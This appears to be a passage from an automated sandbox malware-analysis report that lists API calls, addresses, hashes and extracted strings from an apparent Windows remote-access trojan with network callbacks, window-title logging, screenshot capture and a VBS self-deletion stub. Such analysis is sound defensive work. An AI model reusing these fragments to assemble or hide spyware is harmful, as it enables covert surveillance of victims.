                                                                                        • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 0040A81E
                                                                                          • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,0040412F,00465E74), ref: 0041C49E
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00466468,00000000,00000000,00000000), ref: 0040A927
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                        • String ID: 8SG$8SG$pQG$pQG$PG$PG
                                                                                        • API String ID: 3795512280-1152054767
                                                                                        • Opcode ID: dd9c0471e25d076647664c84ec6971b7212badb5cce70a00efb0c7fa575d8801
                                                                                        • Instruction ID: 265ddfea45d140738b9a7e0f0353a6f5be26653907181caffe3561bb72ed66c0
                                                                                        • Opcode Fuzzy Hash: dd9c0471e25d076647664c84ec6971b7212badb5cce70a00efb0c7fa575d8801
                                                                                        • Instruction Fuzzy Hash: A7517E716043055ACB09BB32C866ABE739A9F80349F00483FB642B71E2DF7C9D09865E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • connect.WS2_32(FFFFFFFF,?,?), ref: 004048E0
                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
                                                                                        • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
                                                                                        • WSAGetLastError.WS2_32 ref: 00404A21
                                                                                          • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                        • String ID: Connection Failed: $Connection Refused$PkGNG$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                        • API String ID: 994465650-3229884001
                                                                                        • Opcode ID: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                                                                        • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
                                                                                        • Opcode Fuzzy Hash: 73075052d8b02f035b309482e82d4e6ffd926ef573fac63689623bdc7e9bf8aa
                                                                                        • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • ___free_lconv_mon.LIBCMT ref: 0045130A
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045051F
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450531
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450543
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450555
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                                                                                          • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
                                                                                        • _free.LIBCMT ref: 004512FF
                                                                                          • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                                                                                          • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                                                        • _free.LIBCMT ref: 00451321
                                                                                        • _free.LIBCMT ref: 00451336
                                                                                        • _free.LIBCMT ref: 00451341
                                                                                        • _free.LIBCMT ref: 00451363
                                                                                        • _free.LIBCMT ref: 00451376
                                                                                        • _free.LIBCMT ref: 00451384
                                                                                        • _free.LIBCMT ref: 0045138F
                                                                                        • _free.LIBCMT ref: 004513C7
                                                                                        • _free.LIBCMT ref: 004513CE
                                                                                        • _free.LIBCMT ref: 004513EB
                                                                                        • _free.LIBCMT ref: 00451403
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                        • String ID:
                                                                                        • API String ID: 161543041-0
                                                                                        • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                        • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
                                                                                        • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
                                                                                        • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __EH_prolog.LIBCMT ref: 00419FB9
                                                                                        • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
                                                                                        • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0041A0FD
                                                                                        • GetLocalTime.KERNEL32(?), ref: 0041A105
                                                                                        • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
                                                                                        • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
                                                                                        • API String ID: 489098229-1431523004
                                                                                        • Opcode ID: 0e7dd5b9c8f3c8bbf87e47502bed00745cf23af802625de92c9b4d39b7d12e2e
                                                                                        • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
                                                                                        • Opcode Fuzzy Hash: 0e7dd5b9c8f3c8bbf87e47502bed00745cf23af802625de92c9b4d39b7d12e2e
                                                                                        • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,?,0040D80F), ref: 00412860
                                                                                          • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF,?,0040D80F), ref: 00412873
                                                                                          • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,?,00000208), ref: 00413714
                                                                                          • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000000), ref: 0041372D
                                                                                          • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(?), ref: 00413738
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
                                                                                        • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
                                                                                        • ExitProcess.KERNEL32 ref: 0040D9C4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
                                                                                        • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
                                                                                        • API String ID: 1913171305-3159800282
                                                                                        • Opcode ID: fa01d9a58f05a7cf40da9c9b0b07af66ac6c6027c41b165ee73ccb5acdae289a
                                                                                        • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
                                                                                        • Opcode Fuzzy Hash: fa01d9a58f05a7cf40da9c9b0b07af66ac6c6027c41b165ee73ccb5acdae289a
                                                                                        • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID:
                                                                                        • API String ID: 269201875-0
                                                                                        • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                        • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
                                                                                        • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
                                                                                        • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
                                                                                        • GetLastError.KERNEL32 ref: 00455CEF
                                                                                        • __dosmaperr.LIBCMT ref: 00455CF6
                                                                                        • GetFileType.KERNEL32(00000000), ref: 00455D02
                                                                                        • GetLastError.KERNEL32 ref: 00455D0C
                                                                                        • __dosmaperr.LIBCMT ref: 00455D15
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00455D35
                                                                                        • CloseHandle.KERNEL32(?), ref: 00455E7F
                                                                                        • GetLastError.KERNEL32 ref: 00455EB1
                                                                                        • __dosmaperr.LIBCMT ref: 00455EB8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                        • String ID: H
                                                                                        • API String ID: 4237864984-2852464175
                                                                                        • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                        • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
                                                                                        • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
                                                                                        • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                                                        • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                                                        • __alloca_probe_16.LIBCMT ref: 00453F94
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                                                        • __freea.LIBCMT ref: 00454003
                                                                                        • __freea.LIBCMT ref: 0045400F
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                        • String ID: \@E
                                                                                        • API String ID: 201697637-1814623452
                                                                                        • Opcode ID: a13eae8444da2cd2cd5bd958d846eb3c57669df7893581f63a52b2ce53b4c5f1
                                                                                        • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                                                        • Opcode Fuzzy Hash: a13eae8444da2cd2cd5bd958d846eb3c57669df7893581f63a52b2ce53b4c5f1
                                                                                        • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,$C,0043EA24,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006), ref: 0044ACA3
                                                                                        • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                                                                        • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,PkGNG,0044AE9A,00000001,00000001,73E85006,?,?,?), ref: 0044AD29
                                                                                        • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                                                                        • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,73E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                                                                        • __freea.LIBCMT ref: 0044AE30
                                                                                          • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,004352BC,?,?,00438847,?,?,00000000,00476B50,?,0040DE62,004352BC,?,?,?,?), ref: 00446169
                                                                                        • __freea.LIBCMT ref: 0044AE39
                                                                                        • __freea.LIBCMT ref: 0044AE5E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                        • String ID: $C$PkGNG
                                                                                        • API String ID: 3864826663-3740547665
                                                                                        • Opcode ID: f1dce60ce4001dd5a90d09b77d0bc29d4a24cdc1178cf7b183dfabd27102bb0f
                                                                                        • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                                                                        • Opcode Fuzzy Hash: f1dce60ce4001dd5a90d09b77d0bc29d4a24cdc1178cf7b183dfabd27102bb0f
                                                                                        • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: _free
                                                                                        • String ID: \&G$\&G$`&G
                                                                                        • API String ID: 269201875-253610517
                                                                                        • Opcode ID: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                                                        • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                                                        • Opcode Fuzzy Hash: 2933b358ac1f2d15da9e4f95fb537f888405f593b8ad3400f10d75b262a195a6
                                                                                        • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 65535$udp
                                                                                        • API String ID: 0-1267037602
                                                                                        • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                        • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                                                        • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                                                        • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • __Init_thread_footer.LIBCMT ref: 0040AD38
                                                                                        • Sleep.KERNEL32(000001F4), ref: 0040AD43
                                                                                        • GetForegroundWindow.USER32 ref: 0040AD49
                                                                                        • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
                                                                                        • Sleep.KERNEL32(000003E8), ref: 0040AE54
                                                                                          • Part of subcall function 0040A636: SetEvent.KERNEL32(00000000,?,00000000,0040B20A,00000000), ref: 0040A662
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                        • String ID: [${ User has been idle for $ minutes }$]
                                                                                        • API String ID: 911427763-3954389425
                                                                                        • Opcode ID: d029bd4235179839c9baf363e6aa800d014436574332bd325cff9a7a557b710f
                                                                                        • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
                                                                                        • Opcode Fuzzy Hash: d029bd4235179839c9baf363e6aa800d014436574332bd325cff9a7a557b710f
                                                                                        • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                                                        • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                                                        • __dosmaperr.LIBCMT ref: 0043A8A6
                                                                                        • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                                                        • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                                                        • __dosmaperr.LIBCMT ref: 0043A8E3
                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                                                        • __dosmaperr.LIBCMT ref: 0043A937
                                                                                        • _free.LIBCMT ref: 0043A943
                                                                                        • _free.LIBCMT ref: 0043A94A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                        • String ID:
                                                                                        • API String ID: 2441525078-0
                                                                                        • Opcode ID: be2abdef093630236b46a14047e2354cdf10b582d669b9bb945715f91254eceb
                                                                                        • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                                                        • Opcode Fuzzy Hash: be2abdef093630236b46a14047e2354cdf10b582d669b9bb945715f91254eceb
                                                                                        • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
                                                                                        • TranslateMessage.USER32(?), ref: 0040557E
                                                                                        • DispatchMessageA.USER32(?), ref: 00405589
                                                                                        • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                                                        • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                        • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                        • API String ID: 2956720200-749203953
                                                                                        • Opcode ID: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                                                                        • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                                                        • Opcode Fuzzy Hash: 23ad1bda7fdc8c2761b743bccdaa4a1370e03c4646df2a0694b798356af57b05
                                                                                        • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                                                        • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                                                        • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                                                          • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000001.2139650597.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000474000.00000040.00000001.00020000.00000000.sdmp
                                                                                        • Associated: 00000006.00000001.2139650597.0000000000478000.00000040.00000001.00020000.00000000.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_1_400000_nmfsxfjX.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                        • String ID: 0VG$0VG$<$@$Temp
                                                                                        • API String ID: 1704390241-2575729100
                                                                                        • Opcode ID: 98959ef4594bcaafc024db97d5732f010b7230a0abd9b713f16470a190596f9f
                                                                                        • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                                                        • Opcode Fuzzy Hash: 98959ef4594bcaafc024db97d5732f010b7230a0abd9b713f16470a190596f9f
                                                                                        • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
